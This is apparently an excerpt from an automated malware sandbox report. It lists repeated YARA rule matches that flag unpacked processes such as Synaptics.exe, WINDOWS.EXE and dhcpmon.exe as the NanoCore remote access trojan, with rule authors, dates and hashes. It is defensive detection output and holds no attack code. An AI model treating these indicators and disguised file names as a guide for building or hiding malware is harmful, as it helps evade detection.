            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
